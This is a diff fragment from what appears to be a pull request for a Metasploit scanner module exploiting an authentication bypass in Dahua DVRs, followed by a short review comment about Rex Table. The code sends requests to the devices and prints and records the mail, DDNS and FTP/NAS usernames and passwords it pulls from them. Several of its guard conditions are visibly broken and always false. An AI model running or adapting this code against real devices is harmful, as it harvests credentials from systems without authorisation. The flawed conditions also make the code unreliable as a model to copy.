modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb

```diff
@@ -0,0 +1,376 @@
+            muser = "#{data[5]}"
+            mpass = "#{data[6]}"
+            mailserver = "#{mailhost[0]}"
+            print_good("MailServer: #{mailserver}")
+            if !mailserver.to_s.strip.length == 0 && !muser.to_s.strip.length == 0 && !mpass.to_s.strip.length == 0
+              report_email_creds(mailserver, rport, muser, mpass) if !mailserver.nil? && !muser.nil? && !mpass.nil?
+            end
+          end
+      end
+    end
+  end
+
+  def grab_ddns
+    connect
+    sock.put(DDNS)
+    if data = sock.get(1024)
+      data = data.split(/&&[0-1]&&/)
+      data.each_with_index do |val, index|
+        if index > 0
+          val = val.split("&&")
+          ddns_service = "#{val[0]}"
+          ddns_server = "#{val[1]}"
+          ddns_port = "#{val[2]}"
+          ddns_domain = "#{val[3]}"
+          ddns_user = "#{val[4]}"
+          ddns_pass = "#{val[5]}"
+          print_status("DDNS Settings @ #{rhost}:#{rport}!:")
+          print_status("  DDNS Service: #{ddns_service}") unless val.nil?
+          print_status("  DDNS Server:  #{ddns_server}") unless val.nil?
+          print_status("  DDNS Port: #{ddns_port}") unless val.nil?
+          print_status("  Domain: #{ddns_domain}") unless val.nil?
+          print_good("  Username: #{ddns_user}") unless val.nil?
+          print_good("  Password: #{ddns_pass}") unless val.nil?
+          if !ddns_server.to_s.strip.length == 0 && !ddns_port.to_s.strip.length == 0 && !ddns_user.to_s.strip.length == 0 && !ddns_pass.to_s.strip.length == 0
+            report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass)
+          end
+        end
+      end
+    end
+  end
+
+  def grab_nas
+    connect
+    sock.put(NAS)
+    if data = sock.get(1024)
+      print_status("Nas Settings @ #{rhost}:#{rport}!:")
+      server = ''
+      port = ''
+      if data =~ /[\x00]{8,}[\x01][\x00]{3,3}([\x0-9a-f]{4,4})([\x0-9a-f]{2,2})/
+        server = Regexp.last_match[1].unpack('C*').join('.')
+        port = Regexp.last_match[2].unpack('S')
+        print_status("  Nas Server #{server}")
+        print_status("  Nas Port: #{port}")
+      end
+      if data =~ /[\x00]{16,}([[:print:]]+)[\x00]{16,}([[:print:]]+)/
+        ftpuser = Regexp.last_match[1]
+        ftppass = Regexp.last_match[2]
+        print_good("  FTP User: #{ftpuser}")
+        print_good("  FTP Password: #{ftppass}")
+        if !ftpuser.to_s.strip.length == 0 && ftppass.to_s.strip.length == 0
+          report_creds(
+            host: server,
+            port: port,
+            user: ftpuser,
+            pass: ftppass,
+            type: "FTP",
+            active: true) if !server.nil? && !port.nil? && !ftpuser.nil? && !ftppass.nil?
+        end
+      end
+    end
+  end
+
+  def grab_channels
+    connect
+    sock.put(CHANNELS)
+    data = sock.get(1024).split('&&')
+    disconnect
+    if data.length > 1
+      print_status("Camera Channels @ #{rhost}:#{rport}!:")
```

Comment:
By Rex Table Im assuming you mean this http://www.rubydoc.info/github/rapid7/metasploit-framework/Rex/Ui/Text/Table. I will see if I can find some example code using it in the framework